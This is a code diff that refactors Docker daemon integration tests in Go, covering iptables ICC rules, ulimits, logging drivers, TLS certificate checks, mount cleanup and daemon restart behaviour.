 	c.Assert(err, check.IsNil)
 }
 
@@ -1000,25 +909,20 @@ func (s *DockerDaemonSuite) TestDaemonICCLinkExpose(c *check.C) {
 	bridgeName := "external-bridge"
 	bridgeIP := "192.169.1.1/24"
 
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
 	defer deleteInterface(c, bridgeName)
 
-	args := []string{"--bridge", bridgeName, "--icc=false"}
-	err = d.StartWithBusybox(args...)
-	c.Assert(err, check.IsNil)
-	defer d.Restart()
-
-	ipTablesCmd := exec.Command("iptables", "-nvL", "FORWARD")
-	out, _, err = runCommandWithOutput(ipTablesCmd)
-	c.Assert(err, check.IsNil)
+	d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false")
+	defer d.Restart(c)
 
+	result := icmd.RunCommand("iptables", "-nvL", "FORWARD")
+	result.Assert(c, icmd.Success)
 	regex := fmt.Sprintf("DROP.*all.*%s.*%s", bridgeName, bridgeName)
-	matched, _ := regexp.MatchString(regex, out)
+	matched, _ := regexp.MatchString(regex, result.Combined())
 	c.Assert(matched, check.Equals, true,
-		check.Commentf("iptables output should have contained %q, but was %q", regex, out))
+		check.Commentf("iptables output should have contained %q, but was %q", regex, result.Combined()))
 
-	out, err = d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567")
+	out, err := d.Cmd("run", "-d", "--expose", "4567", "--name", "icc1", "busybox", "nc", "-l", "-p", "4567")
 	c.Assert(err, check.IsNil, check.Commentf(out))
 
 	out, err = d.Cmd("run", "--link", "icc1:icc1", "busybox", "nc", "icc1", "4567")
@@ -1029,21 +933,19 @@ func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *che
 	bridgeName := "external-bridge"
 	bridgeIP := "192.169.1.1/24"
 
-	out, err := createInterface(c, "bridge", bridgeName, bridgeIP)
-	c.Assert(err, check.IsNil, check.Commentf(out))
+	createInterface(c, "bridge", bridgeName, bridgeIP)
 	defer deleteInterface(c, bridgeName)
 
-	err = s.d.StartWithBusybox("--bridge", bridgeName, "--icc=false")
-	c.Assert(err, check.IsNil)
-	defer s.d.Restart()
+	s.d.StartWithBusybox(c, "--bridge", bridgeName, "--icc=false")
+	defer s.d.Restart(c)
 
-	_, err = s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top")
+	_, err := s.d.Cmd("run", "-d", "--name", "child", "--publish", "8080:80", "busybox", "top")
 	c.Assert(err, check.IsNil)
 	_, err = s.d.Cmd("run", "-d", "--name", "parent", "--link", "child:http", "busybox", "top")
 	c.Assert(err, check.IsNil)
 
-	childIP := s.d.findContainerIP("child")
-	parentIP := s.d.findContainerIP("parent")
+	childIP := s.d.FindContainerIP(c, "child")
+	parentIP := s.d.FindContainerIP(c, "parent")
 
 	sourceRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", childIP, "--sport", "80", "-d", parentIP, "-j", "ACCEPT"}
 	destinationRule := []string{"-i", bridgeName, "-o", bridgeName, "-p", "tcp", "-s", parentIP, "--dport", "80", "-d", childIP, "-j", "ACCEPT"}
@@ -1063,9 +965,7 @@ func (s *DockerDaemonSuite) TestDaemonLinksIpTablesRulesWhenLinkAndUnlink(c *che
 func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 
-	if err := s.d.StartWithBusybox("--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024"); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c, "--default-ulimit", "nofile=42:42", "--default-ulimit", "nproc=1024:1024")
 
 	out, err := s.d.Cmd("run", "--ulimit", "nproc=2048", "--name=test", "busybox", "/bin/sh", "-c", "echo $(ulimit -n); echo $(ulimit -p)")
 	if err != nil {
@@ -1083,13 +983,11 @@ func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) {
 		c.Fatalf("expected `ulimit -n` to be `42`, got: %s", nofile)
 	}
 	if nproc != "2048" {
-		c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc)
+		c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc)
 	}
 
 	// Now restart daemon with a new default
-	if err := s.d.Restart("--default-ulimit", "nofile=43"); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Restart(c, "--default-ulimit", "nofile=43")
 
 	out, err = s.d.Cmd("start", "-a", "test")
 	if err != nil {
@@ -1107,15 +1005,13 @@ func (s *DockerDaemonSuite) TestDaemonUlimitDefaults(c *check.C) {
 		c.Fatalf("expected `ulimit -n` to be `43`, got: %s", nofile)
 	}
 	if nproc != "2048" {
-		c.Fatalf("exepcted `ulimit -p` to be 2048, got: %s", nproc)
+		c.Fatalf("expected `ulimit -p` to be 2048, got: %s", nproc)
 	}
 }
 
 // #11315
 func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c)
 
 	if out, err := s.d.Cmd("run", "--name=test", "busybox"); err != nil {
 		c.Fatal(err, out)
@@ -1125,9 +1021,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) {
 		c.Fatal(err, out)
 	}
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Restart(c)
 
 	if out, err := s.d.Cmd("start", "test2"); err != nil {
 		c.Fatal(err, out)
@@ -1135,16 +1029,14 @@ func (s *DockerDaemonSuite) TestDaemonRestartRenameContainer(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline")
 	c.Assert(err, check.IsNil, check.Commentf(out))
-	id, err := s.d.getIDByName("test")
+	id, err := s.d.GetIDByName("test")
 	c.Assert(err, check.IsNil)
 
-	logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log")
+	logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log")
 
 	if _, err := os.Stat(logPath); err != nil {
 		c.Fatal(err)
@@ -1175,18 +1067,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefault(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "--name=test", "--log-driver=none", "busybox", "echo", "testline")
 	if err != nil {
 		c.Fatal(out, err)
 	}
-	id, err := s.d.getIDByName("test")
+	id, err := s.d.GetIDByName("test")
 	c.Assert(err, check.IsNil)
 
-	logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log")
+	logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log")
 
 	if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) {
 		c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err)
@@ -1194,18 +1084,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverDefaultOverride(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) {
-	if err := s.d.StartWithBusybox("--log-driver=none"); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c, "--log-driver=none")
 
 	out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline")
 	if err != nil {
 		c.Fatal(out, err)
 	}
-	id, err := s.d.getIDByName("test")
+	id, err := s.d.GetIDByName("test")
 	c.Assert(err, check.IsNil)
 
-	logPath := filepath.Join(s.d.folder, "graph", "containers", id, id+"-json.log")
+	logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log")
 
 	if _, err := os.Stat(logPath); err == nil || !os.IsNotExist(err) {
 		c.Fatalf("%s shouldn't exits, error on Stat: %s", logPath, err)
@@ -1213,18 +1101,16 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverNone(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) {
-	if err := s.d.StartWithBusybox("--log-driver=none"); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c, "--log-driver=none")
 
 	out, err := s.d.Cmd("run", "--name=test", "--log-driver=json-file", "busybox", "echo", "testline")
 	if err != nil {
 		c.Fatal(out, err)
 	}
-	id, err := s.d.getIDByName("test")
+	id, err := s.d.GetIDByName("test")
 	c.Assert(err, check.IsNil)
 
-	logPath := filepath.Join(s.d.root, "containers", id, id+"-json.log")
+	logPath := filepath.Join(s.d.Root, "containers", id, id+"-json.log")
 
 	if _, err := os.Stat(logPath); err != nil {
 		c.Fatal(err)
@@ -1255,17 +1141,32 @@ func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneOverride(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonLoggingDriverNoneLogsError(c *check.C) {
-	c.Assert(s.d.StartWithBusybox("--log-driver=none"), checker.IsNil)
+	s.d.StartWithBusybox(c, "--log-driver=none")
 
 	out, err := s.d.Cmd("run", "--name=test", "busybox", "echo", "testline")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	out, err = s.d.Cmd("logs", "test")
 	c.Assert(err, check.NotNil, check.Commentf("Logs should fail with 'none' driver"))
-	expected := `"logs" command is supported only for "json-file" and "journald" logging drivers (got: none)`
+	expected := `configured logging driver does not support reading`
 	c.Assert(out, checker.Contains, expected)
 }
 
+func (s *DockerDaemonSuite) TestDaemonLoggingDriverShouldBeIgnoredForBuild(c *check.C) {
+	s.d.StartWithBusybox(c, "--log-driver=splunk")
+
+	result := cli.BuildCmd(c, "busyboxs", cli.Daemon(s.d),
+		build.WithDockerfile(`
+        FROM busybox
+        RUN echo foo`),
+		build.WithoutCache,
+	)
+	comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", result.Combined(), result.ExitCode, result.Error)
+	c.Assert(result.Error, check.IsNil, comment)
+	c.Assert(result.ExitCode, check.Equals, 0, comment)
+	c.Assert(result.Combined(), checker.Contains, "foo", comment)
+}
+
 func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) {
 	dir, err := ioutil.TempDir("", "socket-cleanup-test")
 	if err != nil {
@@ -1274,17 +1175,13 @@ func (s *DockerDaemonSuite) TestDaemonUnixSockCleanedUp(c *check.C) {
 	defer os.RemoveAll(dir)
 
 	sockPath := filepath.Join(dir, "docker.sock")
-	if err := s.d.Start("--host", "unix://"+sockPath); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Start(c, "--host", "unix://"+sockPath)
 
 	if _, err := os.Stat(sockPath); err != nil {
 		c.Fatal("socket does not exist")
 	}
 
-	if err := s.d.Stop(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Stop(c)
 
 	if _, err := os.Stat(sockPath); err == nil || !os.IsNotExist(err) {
 		c.Fatal("unix socket is not cleaned up")
@@ -1302,13 +1199,8 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) {
 	}
 
 	os.Remove("/etc/docker/key.json")
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Failed to start daemon: %v", err)
-	}
-
-	if err := s.d.Stop(); err != nil {
-		c.Fatalf("Could not stop daemon: %v", err)
-	}
+	s.d.Start(c)
+	s.d.Stop(c)
 
 	config := &Config{}
 	bytes, err := ioutil.ReadFile("/etc/docker/key.json")
@@ -1337,11 +1229,12 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) {
 
 	defer os.Remove("/etc/docker/key.json")
 
-	if err := s.d.Start(); err == nil {
+	if err := s.d.StartWithError(); err == nil {
 		c.Fatalf("It should not be successful to start daemon with wrong key: %v", err)
 	}
 
-	content, _ := ioutil.ReadFile(s.d.logFile.Name())
+	content, err := s.d.ReadLogFile()
+	c.Assert(err, checker.IsNil)
 
 	if !strings.Contains(string(content), "Public Key ID does not match") {
 		c.Fatalf("Missing KeyID message from daemon logs: %s", string(content))
@@ -1349,9 +1242,7 @@ func (s *DockerDaemonSuite) TestDaemonWithWrongkey(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "-id", "busybox", "/bin/cat")
 	if err != nil {
@@ -1363,9 +1254,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartKillWait(c *check.C) {
 		c.Fatalf("Could not kill %s: err=%v\n%s", containerID, err, out)
 	}
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatalf("Could not restart daemon: %v", err)
-	}
+	s.d.Restart(c)
 
 	errchan := make(chan error)
 	go func() {
@@ -1391,14 +1280,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfo(c *check.C) {
 		testDaemonHTTPSAddr = "tcp://localhost:4271"
 	)
 
-	if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem",
-		"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.Start(c,
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/server-cert.pem",
+		"--tlskey", "fixtures/https/server-key.pem",
+		"-H", testDaemonHTTPSAddr)
 
 	args := []string{
 		"--host", testDaemonHTTPSAddr,
-		"--tlsverify", "--tlscacert", "fixtures/https/ca.pem",
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
 		"--tlscert", "fixtures/https/client-cert.pem",
 		"--tlskey", "fixtures/https/client-key.pem",
 		"info",
@@ -1416,10 +1308,8 @@ func (s *DockerDaemonSuite) TestHTTPSRun(c *check.C) {
 		testDaemonHTTPSAddr = "tcp://localhost:4271"
 	)
 
-	if err := s.d.StartWithBusybox("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem",
-		"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.StartWithBusybox(c, "--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem",
+		"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr)
 
 	args := []string{
 		"--host", testDaemonHTTPSAddr,
@@ -1454,14 +1344,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueCert(c *check.C) {
 		testDaemonHTTPSAddr = "tcp://localhost:4271"
 	)
 
-	if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-cert.pem",
-		"--tlskey", "fixtures/https/server-key.pem", "-H", testDaemonHTTPSAddr); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.Start(c,
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/server-cert.pem",
+		"--tlskey", "fixtures/https/server-key.pem",
+		"-H", testDaemonHTTPSAddr)
 
 	args := []string{
 		"--host", testDaemonHTTPSAddr,
-		"--tlsverify", "--tlscacert", "fixtures/https/ca.pem",
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
 		"--tlscert", "fixtures/https/client-rogue-cert.pem",
 		"--tlskey", "fixtures/https/client-rogue-key.pem",
 		"info",
@@ -1479,14 +1372,17 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) {
 		errCaUnknown             = "x509: certificate signed by unknown authority"
 		testDaemonRogueHTTPSAddr = "tcp://localhost:4272"
 	)
-	if err := s.d.Start("--tlsverify", "--tlscacert", "fixtures/https/ca.pem", "--tlscert", "fixtures/https/server-rogue-cert.pem",
-		"--tlskey", "fixtures/https/server-rogue-key.pem", "-H", testDaemonRogueHTTPSAddr); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.Start(c,
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
+		"--tlscert", "fixtures/https/server-rogue-cert.pem",
+		"--tlskey", "fixtures/https/server-rogue-key.pem",
+		"-H", testDaemonRogueHTTPSAddr)
 
 	args := []string{
 		"--host", testDaemonRogueHTTPSAddr,
-		"--tlsverify", "--tlscacert", "fixtures/https/ca.pem",
+		"--tlsverify",
+		"--tlscacert", "fixtures/https/ca.pem",
 		"--tlscert", "fixtures/https/client-rogue-cert.pem",
 		"--tlskey", "fixtures/https/client-rogue-key.pem",
 		"info",
@@ -1497,10 +1393,10 @@ func (s *DockerDaemonSuite) TestHTTPSInfoRogueServerCert(c *check.C) {
 	}
 }
 
-func pingContainers(c *check.C, d *Daemon, expectFailure bool) {
+func pingContainers(c *check.C, d *daemon.Daemon, expectFailure bool) {
 	var dargs []string
 	if d != nil {
-		dargs = []string{"--host", d.sock()}
+		dargs = []string{"--host", d.Sock()}
 	}
 
 	args := append(dargs, "run", "-d", "--name", "container1", "busybox", "top")
@@ -1522,72 +1418,78 @@ func pingContainers(c *check.C, d *Daemon, expectFailure bool) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithSocketAsVolume(c *check.C) {
-	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+	s.d.StartWithBusybox(c)
 
-	socket := filepath.Join(s.d.folder, "docker.sock")
+	socket := filepath.Join(s.d.Folder, "docker.sock")
 
 	out, err := s.d.Cmd("run", "--restart=always", "-v", socket+":/sock", "busybox")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
-	c.Assert(s.d.Restart(), check.IsNil)
+	s.d.Restart(c)
 }
 
 // os.Kill should kill daemon ungracefully, leaving behind container mounts.
-// A subsequent daemon restart shoud clean up said mounts.
+// A subsequent daemon restart should clean up said mounts.
 func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonAndContainerKill(c *check.C) {
-	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	d.StartWithBusybox(c)
 
-	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	out, err := d.Cmd("run", "-d", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
 	id := strings.TrimSpace(out)
-	c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil)
+
+	// If there are no mounts with container id visible from the host
+	// (as those are in container's own mount ns), there is nothing
+	// to check here and the test should be skipped.
 	mountOut, err := ioutil.ReadFile("/proc/self/mountinfo")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
+	if !strings.Contains(string(mountOut), id) {
+		d.Stop(c)
+		c.Skip("no container mounts visible in host ns")
+	}
 
-	// container mounts should exist even after daemon has crashed.
-	comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
-	c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment)
+	// kill the daemon
+	c.Assert(d.Kill(), check.IsNil)
 
 	// kill the container
-	runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", id)
-	if out, ec, err := runCommandWithOutput(runCmd); err != nil {
-		c.Fatalf("Failed to run ctr, ExitCode: %d, err: %v output: %s id: %s\n", ec, err, out, id)
-	}
+	icmd.RunCommand(ctrBinary, "--address", "/var/run/docker/containerd/docker-containerd.sock",
+		"--namespace", moby_daemon.ContainersNamespace, "tasks", "kill", id).Assert(c, icmd.Success)
 
 	// restart daemon.
-	if err := s.d.Restart(); err != nil {
-		c.Fatal(err)
-	}
+	d.Restart(c)
 
 	// Now, container mounts should be gone.
 	mountOut, err = ioutil.ReadFile("/proc/self/mountinfo")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
-	comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, d.Root, mountOut)
 	c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment)
+
+	d.Stop(c)
 }
 
 // os.Interrupt should perform a graceful daemon shutdown and hence cleanup mounts.
 func (s *DockerDaemonSuite) TestCleanupMountsAfterGracefulShutdown(c *check.C) {
-	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+	d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
+	d.StartWithBusybox(c)
 
-	out, err := s.d.Cmd("run", "-d", "busybox", "top")
+	out, err := d.Cmd("run", "-d", "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
 	id := strings.TrimSpace(out)
 
 	// Send SIGINT and daemon should clean up
-	c.Assert(s.d.cmd.Process.Signal(os.Interrupt), check.IsNil)
+	c.Assert(d.Signal(os.Interrupt), check.IsNil)
 	// Wait for the daemon to stop.
-	c.Assert(<-s.d.wait, checker.IsNil)
+	c.Assert(<-d.Wait, checker.IsNil)
 
 	mountOut, err := ioutil.ReadFile("/proc/self/mountinfo")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut))
 
-	comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut)
+	comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, d.Root, mountOut)
 	c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment)
 }
 
 func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) {
 	testRequires(c, DaemonIsLinux, NotUserNamespace)
-	c.Assert(s.d.StartWithBusybox("-b", "none"), check.IsNil)
+	s.d.StartWithBusybox(c, "-b", "none")
 
 	out, err := s.d.Cmd("run", "--rm", "busybox", "ip", "l")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
@@ -1614,16 +1516,12 @@ func (s *DockerDaemonSuite) TestRunContainerWithBridgeNone(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		t.Fatal(err)
-	}
+	s.d.StartWithBusybox(t)
 	if out, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top"); err != nil {
 		t.Fatal(out, err)
 	}
 
-	if err := s.d.Restart(); err != nil {
-		t.Fatal(err)
-	}
+	s.d.Restart(t)
 	// Container 'test' should be removed without error
 	if out, err := s.d.Cmd("rm", "test"); err != nil {
 		t.Fatal(out, err)
@@ -1631,9 +1529,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerRunning(t *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c)
 	out, err := s.d.Cmd("run", "--name", "netns", "-d", "busybox", "top")
 	if err != nil {
 		c.Fatal(out, err)
@@ -1651,51 +1547,50 @@ func (s *DockerDaemonSuite) TestDaemonRestartCleanupNetns(c *check.C) {
 	}
 
 	// Test if the file still exists
-	out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName))
-	out = strings.TrimSpace(out)
-	c.Assert(err, check.IsNil, check.Commentf("Output: %s", out))
-	c.Assert(out, check.Equals, fileName, check.Commentf("Output: %s", out))
+	icmd.RunCommand("stat", "-c", "%n", fileName).Assert(c, icmd.Expected{
+		Out: fileName,
+	})
 
 	// Remove the container and restart the daemon
 	if out, err := s.d.Cmd("rm", "netns"); err != nil {
 		c.Fatal(out, err)
 	}
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Restart(c)
 
 	// Test again and see now the netns file does not exist
-	out, _, err = runCommandWithOutput(exec.Command("stat", "-c", "%n", fileName))
-	out = strings.TrimSpace(out)
-	c.Assert(err, check.Not(check.IsNil), check.Commentf("Output: %s", out))
+	icmd.RunCommand("stat", "-c", "%n", fileName).Assert(c, icmd.Expected{
+		Err:      "No such file or directory",
+		ExitCode: 1,
+	})
 }
 
 // tests regression detailed in #13964 where DOCKER_TLS_VERIFY env is ignored
 func (s *DockerDaemonSuite) TestDaemonTLSVerifyIssue13964(c *check.C) {
 	host := "tcp://localhost:4271"
-	c.Assert(s.d.Start("-H", host), check.IsNil)
-	cmd := exec.Command(dockerBinary, "-H", host, "info")
-	cmd.Env = []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"}
-	out, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, check.Not(check.IsNil), check.Commentf("%s", out))
-	c.Assert(strings.Contains(out, "error during connect"), check.Equals, true)
-
+	s.d.Start(c, "-H", host)
+	icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "-H", host, "info"},
+		Env:     []string{"DOCKER_TLS_VERIFY=1", "DOCKER_CERT_PATH=fixtures/https"},
+	}).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "error during connect",
+	})
 }
 
 func setupV6(c *check.C) {
 	// Hack to get the right IPv6 address on docker0, which has already been created
 	result := icmd.RunCommand("ip", "addr", "add", "fe80::1/64", "dev", "docker0")
-	result.Assert(c, icmd.Expected{})
+	result.Assert(c, icmd.Success)
 }
 
 func teardownV6(c *check.C) {
 	result := icmd.RunCommand("ip", "addr", "del", "fe80::1/64", "dev", "docker0")
-	result.Assert(c, icmd.Expected{})
+	result.Assert(c, icmd.Success)
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlways(c *check.C) {
-	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top")
 	c.Assert(err, check.IsNil)
@@ -1710,7 +1605,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlway
 	c.Assert(err, check.IsNil)
 	c.Assert(out, check.Equals, "")
 
-	c.Assert(s.d.Restart(), check.IsNil)
+	s.d.Restart(c)
 
 	out, err = s.d.Cmd("ps", "-q")
 	c.Assert(err, check.IsNil)
@@ -1718,9 +1613,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithContainerWithRestartPolicyAlway
 }
 
 func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) {
-	if err := s.d.StartWithBusybox("--log-opt=max-size=1k"); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c, "--log-opt=max-size=1k")
 	name := "logtest"
 	out, err := s.d.Cmd("run", "-d", "--log-opt=max-file=5", "--name", name, "busybox", "top")
 	c.Assert(err, check.IsNil, check.Commentf("Output: %s, err: %v", out, err))
@@ -1736,18 +1629,14 @@ func (s *DockerDaemonSuite) TestDaemonWideLogConfig(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c)
 	if out, err := s.d.Cmd("run", "-i", "-d", "--name", "test", "busybox", "top"); err != nil {
 		c.Fatal(err, out)
 	}
 	if out, err := s.d.Cmd("pause", "test"); err != nil {
 		c.Fatal(err, out)
 	}
-	if err := s.d.Restart(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Restart(c)
 
 	errchan := make(chan error)
 	go func() {
@@ -1773,12 +1662,12 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPausedContainer(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) {
-	c.Assert(s.d.StartWithBusybox(), check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("create", "-v", "test:/foo", "busybox")
 	c.Assert(err, check.IsNil, check.Commentf(out))
 
-	c.Assert(s.d.Restart(), check.IsNil)
+	s.d.Restart(c)
 
 	out, err = s.d.Cmd("volume", "rm", "test")
 	c.Assert(err, check.NotNil, check.Commentf("should not be able to remove in use volume after daemon restart"))
@@ -1786,54 +1675,52 @@ func (s *DockerDaemonSuite) TestDaemonRestartRmVolumeInUse(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartLocalVolumes(c *check.C) {
-	c.Assert(s.d.Start(), check.IsNil)
+	s.d.Start(c)
 
 	_, err := s.d.Cmd("volume", "create", "test")
 	c.Assert(err, check.IsNil)
-	c.Assert(s.d.Restart(), check.IsNil)
+	s.d.Restart(c)
 
 	_, err = s.d.Cmd("volume", "inspect", "test")
 	c.Assert(err, check.IsNil)
 }
 
+// FIXME(vdemeester) should be a unit test
 func (s *DockerDaemonSuite) TestDaemonCorruptedLogDriverAddress(c *check.C) {
-	c.Assert(s.d.Start("--log-driver=syslog", "--log-opt", "syslog-address=corrupted:42"), check.NotNil)
-	expected := "Failed to set log opts: syslog-address should be in form proto://address"
-	runCmd := exec.Command("grep", expected, s.d.LogFileName())
-	if out, _, err := runCommandWithOutput(runCmd); err != nil {
-		c.Fatalf("Expected %q message; but doesn't exist in log: %q, err: %v", expected, out, err)
-	}
